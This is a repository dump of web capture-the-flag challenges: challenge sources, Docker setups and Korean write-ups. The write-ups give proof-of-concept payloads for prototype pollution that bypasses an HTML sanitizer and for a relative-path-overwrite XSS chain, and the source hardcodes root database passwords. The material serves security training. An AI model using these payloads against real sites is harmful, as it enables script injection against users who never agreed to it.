'; 48 | } 49 | } 50 | 51 | -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.7.9 2 | 3 | RUN mkdir /service 4 | COPY ./src /service 5 | RUN chmod 777 -R /service 6 | 7 | COPY ./flag /flag 8 | 9 | RUN pip install -r /service/requirements.txt 10 | 11 | EXPOSE 8081 12 | ENTRYPOINT ["python"] 13 | CMD ["/service/app.py"] -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/flag: -------------------------------------------------------------------------------- 1 | LAYER7{XXXXXXXXX} -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/about.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | About - The Bread Factory Website Template 7 | 8 | 9 | 10 |
11 |
12 | 13 | 20 |
21 |
22 |
23 |
24 |

We Have Free Templates for Everyone

25 |

Our website templates are created with inspiration, checked for quality and originality and meticulously sliced and coded. What's more, they're absolutely free! You can do a lot with them. You can modify them. You can use them to design websites for clients, so long as you agree with the Terms of Use. You can even remove all our links if you want to.

26 |

We Have More Templates for You

27 |

Looking for more templates? Just browse through all our Free Website Templates and find what you're looking for. But if you don't find any website template you can use, you can try our Free Web Design service and tell us all about it. Maybe you're looking for something different, something special. And we love the challenge of doing something different and something special.

28 |

Be Part of Our Community

29 |

If you're experiencing issues and concerns about this website template, join the discussion on our forum and meet other people in the community who share the same interests with you.

30 |

Template details

31 |

Design version 7
Code version 3
Website Template details, discussion and updates for this The Bread Factory Website Template. Website Template design by Free Website Templates. Please feel free to remove some or all the text and links of this page and replace it with your own About content.

32 |
33 |
34 | 39 | 40 | -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/breadfactorytemplate.psd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/breadfactorytemplate.psd -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/images/bg-aside.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/bg-aside.jpg -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/images/bg-blog-heading.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/bg-blog-heading.png -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/images/bg-body.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/bg-body.jpg -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/images/bg-content.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/bg-content.jpg -------------------------------------------------------------------------------- 
/2021/LAYER7_CTF/handmade/src/htdocs/images/bg-footer.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/bg-footer.gif -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/images/bg-header.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/bg-header.gif -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/images/bg-menu-selected.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/bg-menu-selected.jpg -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/images/bg-menu-selected2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/bg-menu-selected2.jpg -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/images/collection.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/collection.jpg -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/images/croissants.jpg: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/croissants.jpg -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/images/favorites.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/favorites.jpg -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/images/icons.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/icons.png -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/images/interface.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/interface.png -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/images/loafs.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/loafs.jpg -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/images/logo.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/logo.png -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/images/sandwiches.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/sandwiches.jpg -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/images/traditional.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/traditional.jpg -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/images/whats-new.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/whats-new.png -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/requirements.txt: -------------------------------------------------------------------------------- 1 | certifi==2021.10.8 2 | charset-normalizer==2.0.7 3 | idna==3.3 4 | urllib3==1.26.7 5 | -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/response_form.py: -------------------------------------------------------------------------------- 1 | def not_found(): 2 | res = [] 3 | res.append('HTTP/1.1 404 Not Found') 4 | res.append('Content-Type: text/html;charset=utf-8') 5 | res.append('Content-Length: 18') 6 | res.append('Connection: close') 7 | 
res.append('') 8 | res.append('

Not found

') 9 | 10 | res = '\r\n'.join(res) 11 | return res.encode() 12 | 13 | def redirect(location='/'): 14 | res = [] 15 | res.append('HTTP/1.1 301 Moved Permanently') 16 | res.append('Content-Type: text/html;charset=utf-8') 17 | res.append(f"Location: {location}") 18 | res.append('Content-Length: 26') 19 | res.append('Connection: close') 20 | res.append('') 21 | res.append('

Moved Permanently

') 22 | 23 | res = '\r\n'.join(res) 24 | return res.encode() 25 | 26 | def bad_request(): 27 | res = [] 28 | res.append('HTTP/1.1 400 Bad Request') 29 | res.append('Content-Type: text/html;charset=utf-8') 30 | res.append('Content-Length: 18') 31 | res.append('Connection: close') 32 | res.append('') 33 | res.append('

Bad Request

') 34 | 35 | res = '\r\n'.join(res) 36 | return res.encode() 37 | 38 | def not_allow_method(allow_method=['GET']): 39 | res = [] 40 | res.append('HTTP/1.1 405 Method Not Allowed') 41 | res.append(f"Allow: {','.join(allow_method)}") 42 | res.append(f"Access-Control-Allow-Methods: {','.join(allow_method)}") 43 | res.append('Content-Length: 27') 44 | res.append('Content-Type: text/html;charset=utf-8') 45 | res.append('Connection: close') 46 | res.append('') 47 | res.append('

Method Not Allowed

') 48 | 49 | res = '\r\n'.join(res) 50 | return res.encode() 51 | 52 | def internal_server_error(error_msg=""): 53 | res = [] 54 | body = f"

Internal Server Error

{error_msg}" 55 | 56 | res.append('HTTP/1.1 500 Internal Server Error') 57 | res.append(f"Content-Length: {len(body)}") 58 | res.append('Content-Type: text/html;charset=utf-8') 59 | res.append('Connection: close') 60 | res.append('') 61 | res.append(body) 62 | 63 | res = '\r\n'.join(res) 64 | return res.encode() 65 | 66 | def normal_response(content, content_type='text/plain'): 67 | if content_type == None: 68 | content_type = 'text/plain' 69 | 70 | res = [] 71 | res.append('HTTP/1.1 200 OK') 72 | res.append(f"Content-Length: {len(content)}") 73 | res.append(f"Content-Type: {content_type}") 74 | res.append('Connection: close') 75 | 76 | res = ('\r\n'.join(res)).encode() 77 | res += b'\r\n\r\n' 78 | res += content 79 | 80 | return res -------------------------------------------------------------------------------- /2021/LAYER7_CTF/selfmade/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.7.9 2 | 3 | RUN mkdir /service 4 | COPY ./src /service 5 | RUN chmod 777 -R /service 6 | 7 | COPY ./flag /flag 8 | 9 | RUN pip install -r /service/requirements.txt 10 | 11 | EXPOSE 8080 12 | ENTRYPOINT ["python"] 13 | CMD ["/service/app.py"] -------------------------------------------------------------------------------- /2021/LAYER7_CTF/selfmade/flag: -------------------------------------------------------------------------------- 1 | LAYER7{XXXXXXXXX} -------------------------------------------------------------------------------- /2021/LAYER7_CTF/selfmade/src/contents/1: -------------------------------------------------------------------------------- 1 | this is first content -------------------------------------------------------------------------------- /2021/LAYER7_CTF/selfmade/src/contents/2: -------------------------------------------------------------------------------- 1 | this is second content -------------------------------------------------------------------------------- 
/2021/LAYER7_CTF/selfmade/src/htdocs/index.html: -------------------------------------------------------------------------------- 1 |

hello

-------------------------------------------------------------------------------- /2021/LAYER7_CTF/selfmade/src/requirements.txt: -------------------------------------------------------------------------------- 1 | certifi==2021.10.8 2 | charset-normalizer==2.0.7 3 | idna==3.3 4 | requests==2.26.0 5 | urllib3==1.26.7 6 | -------------------------------------------------------------------------------- /2021/LAYER7_CTF/selfmade/src/response_form.py: -------------------------------------------------------------------------------- 1 | def not_found(): 2 | res = [] 3 | res.append('HTTP/1.1 404 Not Found') 4 | res.append('Content-Type: text/html;charset=utf-8') 5 | res.append('Content-Length: 18') 6 | res.append('Connection: close') 7 | res.append('') 8 | res.append('

Not found

') 9 | 10 | res = '\r\n'.join(res) 11 | return res 12 | 13 | def redirect(location='/'): 14 | res = [] 15 | res.append('HTTP/1.1 301 Moved Permanently') 16 | res.append('Content-Type: text/html;charset=utf-8') 17 | res.append(f"Location: {location}") 18 | res.append('Content-Length: 26') 19 | res.append('Connection: close') 20 | res.append('') 21 | res.append('

Moved Permanently

') 22 | 23 | res = '\r\n'.join(res) 24 | return res 25 | 26 | def bad_request(): 27 | res = [] 28 | res.append('HTTP/1.1 400 Bad Request') 29 | res.append('Content-Type: text/html;charset=utf-8') 30 | res.append('Content-Length: 18') 31 | res.append('Connection: close') 32 | res.append('') 33 | res.append('

Bad Request

') 34 | 35 | res = '\r\n'.join(res) 36 | return res 37 | 38 | def not_allow_method(allow_method=['GET']): 39 | res = [] 40 | res.append('HTTP/1.1 405 Method Not Allowed') 41 | res.append(f"Allow: {','.join(allow_method)}") 42 | res.append(f"Access-Control-Allow-Methods: {','.join(allow_method)}") 43 | res.append('Content-Length: 27') 44 | res.append('Content-Type: text/html;charset=utf-8') 45 | res.append('Connection: close') 46 | res.append('') 47 | res.append('

Method Not Allowed

') 48 | 49 | res = '\r\n'.join(res) 50 | return res 51 | 52 | def internal_server_error(error_msg=""): 53 | res = [] 54 | body = f"

Internal Server Error

{error_msg}" 55 | 56 | res.append('HTTP/1.1 500 Internal Server Error') 57 | res.append(f"Content-Length: {len(body)}") 58 | res.append('Content-Type: text/html;charset=utf-8') 59 | res.append('Connection: close') 60 | res.append('') 61 | res.append(body) 62 | 63 | res = '\r\n'.join(res) 64 | return res 65 | 66 | def normal_response(content, content_type='text/plain'): 67 | if content_type == None: 68 | content_type = 'text/plain' 69 | 70 | res = [] 71 | res.append('HTTP/1.1 200 OK') 72 | res.append(f"Content-Length: {len(content)}") 73 | res.append(f"Content-Type: {content_type}") 74 | res.append('Connection: close') 75 | res.append('') 76 | res.append(str(content)) 77 | 78 | res = '\r\n'.join(res) 79 | return res -------------------------------------------------------------------------------- /2022/BOB_WEB_CTF/dom_clobbering/writeup/writeup.txt: -------------------------------------------------------------------------------- 1 | PoC: 2 | ?username=%27> 3 | 4 | 5 | 풀이 설명: 6 | 7 | 1. DOM Clobbering을 이용하여 APPINFO.message.title의 값을 임의로 설정할 수 있다. 8 | 9 | 2. -------------------------------------------------------------------------------- /2022/BOB_WEB_CTF/pp/config.js: -------------------------------------------------------------------------------- 1 | function appInit(){ 2 | _get = parseParams(location.search.slice(1)); 3 | htmlSanitizer = new goog.html.sanitizer.HtmlSanitizer(); 4 | } 5 | 6 | function parseParams(queryString, decodeKeys, decodeValues){ 7 | if (decodeKeys == null) decodeKeys = true; 8 | if (decodeValues == null) decodeValues = true; 9 | 10 | var vars = queryString.split(/[&;]/); 11 | var obj = {}; 12 | if (!vars.length) return obj; 13 | 14 | vars.forEach(function(val){ 15 | var index = val.indexOf('=') + 1; 16 | var value = index ? val.substr(index) : ''; 17 | var keys = index ? 
val.substr(0, index - 1).match(/([^\]\[]+|(\B)(?=\]))/g) : [val]; 18 | 19 | if (!keys) return; 20 | if (decodeValues) value = decodeURIComponent(value); 21 | keys.forEach(function(key, i){ 22 | if (decodeKeys) key = decodeURIComponent(key); 23 | var current = obj[key]; 24 | 25 | if (i < keys.length - 1) obj = obj[key] = current || {}; 26 | else if (typeof(current) == 'array') current.push(value); 27 | else obj[key] = current != null ? [current, value] : value; 28 | }); 29 | }); 30 | 31 | return obj; 32 | } -------------------------------------------------------------------------------- /2022/BOB_WEB_CTF/pp/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 |
10 | 14 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /2022/BOB_WEB_CTF/pp/writeup/writeup.txt: -------------------------------------------------------------------------------- 1 | PoC: 2 | ?__proto__[*%20SRC]=1&constructor[prototype][*%20ONERROR]=1&msg= 3 | 4 | 5 | 풀이 설명: 6 | 7 | 1. parseParams 함수에서 prototype pollution이 발생한다. 8 | -> config.js의 21~28 line 9 | 10 | 2. prototype pollution을 통해 closure모듈(html sanitize)에서 임의의 속성값을 allow할 수 있게끔 변수 조작이 가능하다. 11 | -> Object.prototype['* ONERROR'] = 1; 12 | Object.prototype['* SRC'] = 1; 13 | 14 | 3. ?__proto__[* SRC]=1&constructor[prototype][* ONERROR]=1 로 오염시키고, msg에서 XSS하면 된다. 15 | 16 | 17 | 레퍼런스: https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/ -------------------------------------------------------------------------------- /2022/BOB_WEB_CTF/rpo/config.js: -------------------------------------------------------------------------------- 1 | /* default values config */ 2 | let name = "admin"; 3 | let msg = "Can you get what you want?"; -------------------------------------------------------------------------------- /2022/BOB_WEB_CTF/rpo/index.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 12 | 13 |
14 |
15 | 29 | 30 | -------------------------------------------------------------------------------- /2022/BOB_WEB_CTF/rpo/writeup/exploit.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2022/BOB_WEB_CTF/rpo/writeup/writeup.txt: -------------------------------------------------------------------------------- 1 | PoC(exploit.html): 2 | 7 | 8 | exploit.html을 공격자 서버로 올리고, 봇 접속을 공격자 서버의 exploit.html로 유도. 9 | 10 | 11 | 풀이 설명: 12 | 13 | 1. Relative Path Overwrite 공격으로 config.js를 불러오지 못하게한다. 14 | 15 | -> http://문제url/index.php/aaaaaa 16 | 17 | 2. 1번 과정을 통해 window.name 설정이 자유로워진다. (config.js에서 초기화하지 않기 때문에) 18 | 19 | -> window.name은 origin이 바뀌어도 그대로 유지된다는 점 이용하여 스크립트 삽입 20 | 21 | 3. 단, name을 5자로 자르고 있다. name = name.substr(0, 5); 22 | 23 | -> window.name=' 위와 같이 window.name을 조작하여 다시 문제 url로 redirect 시킨다. 25 | 26 | 4. msg를 '" src=x onerror=alert(1)>'로 설정해주면 alert(1)가 실행된다. 27 | 28 | ->

${name} said "${msg}"

29 | 30 | ->

"

31 | 32 | -> alert(1)! 33 | 34 | 35 | -------------------------------------------------------------------------------- /2022/HSPACE_CTF/hspace_proxy/admin/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM mariadb:latest 2 | 3 | RUN apt update && apt install -y python3 python3-pip vim curl 4 | 5 | RUN mkdir /app 6 | COPY ./admin/src/ /app 7 | RUN chmod 777 -R /app 8 | 9 | RUN pip install -r /app/requirements.txt 10 | 11 | COPY ./admin/flag.txt /flag.txt 12 | RUN chmod 777 /flag.txt 13 | 14 | EXPOSE 80 -------------------------------------------------------------------------------- /2022/HSPACE_CTF/hspace_proxy/admin/db/init.sql: -------------------------------------------------------------------------------- 1 | SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO"; 2 | SET NAMES utf8mb4; 3 | 4 | CREATE TABLE `admin` ( 5 | `username` VARCHAR(32) NOT NULL, 6 | `password` VARCHAR(32) NOT NULL, 7 | `token` VARCHAR(64) NOT NULL 8 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4; 9 | 10 | CREATE TABLE `notice` ( 11 | `notice_id` VARCHAR(36) NOT NULL, 12 | `title` VARCHAR(32) NOT NULL, 13 | `contents` TEXT NOT NULL 14 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4; 15 | 16 | INSERT INTO `admin` VALUES ('admin', '[CENSORED]', '[CENSORED]'); 17 | INSERT INTO `notice` VALUES 18 | ('cf14a064-f06b-4cfc-95d4-3acca4dd945d', 'Welcome to hpsace proxy.', "Hspace proxy is free online proxy service,\nBut it's still a beta version."), 19 | ('5acf8929-990f-49a5-90a0-cd00c9179670', 'How do I use this service?', "It's very simple to use.\nEnter the url and click the connect button."), 20 | ('5162d7a3-31da-4dc0-87d6-2be3f3ca47bf', 'Launch bug bounty program!', 'We have launched bug bounty!\nPlease find vulnerabilities in our service :)'); 21 | -------------------------------------------------------------------------------- /2022/HSPACE_CTF/hspace_proxy/admin/flag.txt: -------------------------------------------------------------------------------- 1 | 
hspace{fake-flag} -------------------------------------------------------------------------------- /2022/HSPACE_CTF/hspace_proxy/admin/src/htdocs/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Admin panel 7 | 8 | 9 |

Admin panel

10 |

Hspace proxy admin panel

11 |
12 | 13 | 14 | 15 |
16 | 17 | 29 | 30 | -------------------------------------------------------------------------------- /2022/HSPACE_CTF/hspace_proxy/admin/src/htdocs/write.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Admin panel 7 | 8 | 9 |

Admin panel

10 |

Hspace proxy admin panel (notice write)

11 |
12 |
13 | 14 | 15 |
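16 | 17 | 31 | 32 |
--------------------------------------------------------------------------------
/2022/HSPACE_CTF/hspace_proxy/admin/src/model.py:
--------------------------------------------------------------------------------
import hmac
import pymysql
import uuid


def connect_db():
    """Open a new connection to the local `hspace_proxy` database.

    Rows are returned as dicts (DictCursor), so callers index columns by name.
    """
    # NOTE(review): this connects as root with a password committed to source.
    # Outside a throwaway challenge container, use a least-privilege account
    # and load the secret from the environment or a secret store.
    return pymysql.connect(
        host='localhost',
        user='root',
        passwd='hspace',
        db='hspace_proxy',
        charset='utf8mb4',
        cursorclass=pymysql.cursors.DictCursor)


def check_token(token):
    """Return True when `token` equals the token stored in the `admin` table.

    Returns False (instead of raising) when the table has no row or when
    either value is not a string.
    """
    db = connect_db()
    try:
        cursor = db.cursor()
        cursor.execute("SELECT token FROM admin LIMIT 1")
        fetch = cursor.fetchone()
    finally:
        # Release the connection even if the query fails.
        db.close()

    if not fetch:
        return False

    stored = fetch['token']
    if not isinstance(stored, str) or not isinstance(token, str):
        return False

    # Constant-time comparison so response timing does not reveal how many
    # leading characters of a guessed token are correct.
    return hmac.compare_digest(stored.encode(), token.encode())


def login(username, password):
    """Look up an admin row matching `username` and `password`.

    Returns {"status": True, "token": <token>} on a match and
    {"status": False} otherwise, including on any database error.
    """
    try:
        db = connect_db()
        try:
            cursor = db.cursor()
            # Values are bound as parameters, never formatted into the SQL
            # text, so quotes in `username`/`password` cannot alter the query.
            cursor.execute(
                "SELECT * FROM admin WHERE username=%s AND password=%s",
                (username, password))
            fetch = cursor.fetchone()
        finally:
            db.close()

        if fetch:
            return {"status": True, "token": fetch['token']}

        return {"status": False}
    except Exception:
        # Best-effort contract kept from the original: errors read as a
        # failed login rather than propagating to the caller.
        return {"status": False}


def write_notice(title, contents):
    """Insert a notice under a fresh UUID4 id.

    Returns {"status": True, "notice_id": <id>} on success and
    {"status": False} on any database error.
    """
    try:
        db = connect_db()
        try:
            cursor = db.cursor()
            notice_id = str(uuid.uuid4())
            # Parameter binding keeps `title`/`contents` as data; they are
            # stored verbatim, so whatever renders them must escape on output.
            cursor.execute(
                "INSERT INTO notice VALUE (%s, %s, %s)",
                (notice_id, title, contents))
            db.commit()
        finally:
            db.close()

        return {"status": True, "notice_id": notice_id}
    except Exception:
        return {"status": False}
--------------------------------------------------------------------------------
/2022/HSPACE_CTF/hspace_proxy/admin/src/requirements.txt:
--------------------------------------------------------------------------------
1 | certifi==2021.10.8
2 | charset-normalizer==2.0.7
3 | idna==3.3
4 | requests==2.26.0
5 | urllib3==1.26.7
6 | pymysql==1.0.2
--------------------------------------------------------------------------------
/2022/HSPACE_CTF/hspace_proxy/admin/src/response_form.py: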
-------------------------------------------------------------------------------- 1 | def not_found(): 2 | res = [] 3 | res.append('HTTP/1.1 404 Not Found') 4 | res.append('Content-Type: text/html;charset=utf-8') 5 | res.append('Content-Length: 18') 6 | res.append('Connection: close') 7 | res.append('') 8 | res.append('

Not found

') 9 | 10 | res = '\r\n'.join(res) 11 | return res 12 | 13 | def redirect(location='/'): 14 | res = [] 15 | res.append('HTTP/1.1 301 Moved Permanently') 16 | res.append('Content-Type: text/html;charset=utf-8') 17 | res.append(f"Location: {location}") 18 | res.append('Content-Length: 26') 19 | res.append('Connection: close') 20 | res.append('') 21 | res.append('

Moved Permanently

') 22 | 23 | res = '\r\n'.join(res) 24 | return res 25 | 26 | def bad_request(): 27 | res = [] 28 | res.append('HTTP/1.1 400 Bad Request') 29 | res.append('Content-Type: text/html;charset=utf-8') 30 | res.append('Content-Length: 18') 31 | res.append('Connection: close') 32 | res.append('') 33 | res.append('

Bad Request

') 34 | 35 | res = '\r\n'.join(res) 36 | return res 37 | 38 | def not_allow_method(allow_method=['GET']): 39 | res = [] 40 | res.append('HTTP/1.1 405 Method Not Allowed') 41 | res.append(f"Allow: {','.join(allow_method)}") 42 | res.append(f"Access-Control-Allow-Methods: {','.join(allow_method)}") 43 | res.append('Content-Length: 27') 44 | res.append('Content-Type: text/html;charset=utf-8') 45 | res.append('Connection: close') 46 | res.append('') 47 | res.append('

Method Not Allowed

') 48 | 49 | res = '\r\n'.join(res) 50 | return res 51 | 52 | def internal_server_error(error_msg=""): 53 | res = [] 54 | body = f"

Internal Server Error

{error_msg}" 55 | 56 | res.append('HTTP/1.1 500 Internal Server Error') 57 | res.append(f"Content-Length: {len(body)}") 58 | res.append('Content-Type: text/html;charset=utf-8') 59 | res.append('Connection: close') 60 | res.append('') 61 | res.append(body) 62 | 63 | res = '\r\n'.join(res) 64 | return res 65 | 66 | def normal_response(content, content_type='text/plain'): 67 | if content_type == None: 68 | content_type = 'text/plain' 69 | 70 | res = [] 71 | res.append('HTTP/1.1 200 OK') 72 | res.append(f"Content-Length: {len(content)}") 73 | res.append(f"Content-Type: {content_type}") 74 | res.append('Connection: close') 75 | res.append('') 76 | res.append(str(content)) 77 | 78 | res = '\r\n'.join(res) 79 | return res -------------------------------------------------------------------------------- /2022/HSPACE_CTF/hspace_proxy/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | public: 5 | build: 6 | context: . 7 | dockerfile: ./public/Dockerfile 8 | restart: always 9 | ports: 10 | - "8080:8080" 11 | links: 12 | - admin.internal 13 | 14 | admin.internal: 15 | build: 16 | context: . 
17 | dockerfile: ./admin/Dockerfile 18 | restart: always 19 | volumes: 20 | - ./admin/db:/docker-entrypoint-initdb.d 21 | environment: 22 | - MYSQL_ROOT_PASSWORD=hspace 23 | - MYSQL_DATABASE=hspace_proxy 24 | - MYSQL_TCP_PORT=3306 25 | - TZ=Asia/Seoul 26 | entrypoint: ["/bin/bash", "-c"] 27 | command: 28 | - | 29 | docker-entrypoint.sh mariadbd & 30 | python3 /app/app.py -------------------------------------------------------------------------------- /2022/HSPACE_CTF/hspace_proxy/public/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10 2 | 3 | RUN mkdir /app 4 | COPY ./public/src /app 5 | RUN chmod 777 -R /app 6 | 7 | RUN pip install -r /app/requirements.txt 8 | 9 | EXPOSE 8080 10 | ENTRYPOINT ["python"] 11 | 12 | CMD ["/app/app.py"] -------------------------------------------------------------------------------- /2022/HSPACE_CTF/hspace_proxy/public/src/htdocs/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Hspace proxy 7 | 8 | 9 | 10 |

Hspace proxy

11 |

free online proxy (beta version)

12 |
13 |
14 | GET 15 | POST
16 |
17 | 18 | 19 |
20 | 21 | 38 | 39 | -------------------------------------------------------------------------------- /2022/HSPACE_CTF/hspace_proxy/public/src/htdocs/notice.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Hspace proxy 7 | 8 | 9 | 10 |

Hspace proxy

11 |

Top notice

12 |
13 |
14 |
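15 | 32 | 33 |
--------------------------------------------------------------------------------
/2022/HSPACE_CTF/hspace_proxy/public/src/model.py:
--------------------------------------------------------------------------------
import pymysql
import uuid


def connect_db():
    """Open a new connection to the `hspace_proxy` database on `admin.internal`.

    Rows are returned as dicts (DictCursor), so callers index columns by name.
    """
    # NOTE(review): the public-facing service logs in as root with a password
    # committed to source. A read-only account limited to the `notice` table
    # would contain the impact of any query bug in this module.
    return pymysql.connect(
        host='admin.internal',
        user='root',
        passwd='hspace',
        db='hspace_proxy',
        charset='utf8mb4',
        cursorclass=pymysql.cursors.DictCursor)


def read_notice(notice_id):
    """Fetch one notice by id.

    Returns {"status": True, "data": <row dict>} when a row matches and
    {"status": False} when none does or when the database call fails.
    """
    try:
        db = connect_db()
        try:
            cursor = db.cursor()
            # `notice_id` is bound as a parameter rather than formatted into
            # the statement, so it is always treated as a value to compare.
            cursor.execute(
                "SELECT * FROM notice WHERE notice_id=%s",
                (notice_id,))
            fetch = cursor.fetchone()
        finally:
            # Release the connection even if the query fails.
            db.close()

        if fetch:
            return {"status": True, "data": fetch}

        return {"status": False}
    except Exception:
        # Best-effort contract kept from the original: errors read as
        # "not found" rather than propagating to the caller.
        return {"status": False}


def list_notice():
    """Return up to three notice rows as a list of dicts, or [] on error."""
    try:
        db = connect_db()
        try:
            cursor = db.cursor()
            cursor.execute("SELECT * FROM notice WHERE 1 LIMIT 3")
            return list(cursor.fetchall())
        finally:
            db.close()
    except Exception:
        return []
--------------------------------------------------------------------------------
/2022/HSPACE_CTF/hspace_proxy/public/src/requirements.txt:
--------------------------------------------------------------------------------
1 | certifi==2021.10.8
2 | charset-normalizer==2.0.7
3 | idna==3.3
4 | requests==2.26.0
5 | urllib3==1.26.7
6 | pymysql==1.0.2
--------------------------------------------------------------------------------
/2022/HSPACE_CTF/hspace_proxy/public/src/response_form.py:
--------------------------------------------------------------------------------
1 | def not_found(): 2 | res = [] 3 | res.append('HTTP/1.1 404 Not Found') 4 | res.append('Content-Type: text/html;charset=utf-8') 5 | res.append('Content-Length: 18') 6 | res.append('Connection: close') 7 | res.append('') 8 | res.append('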

Not found

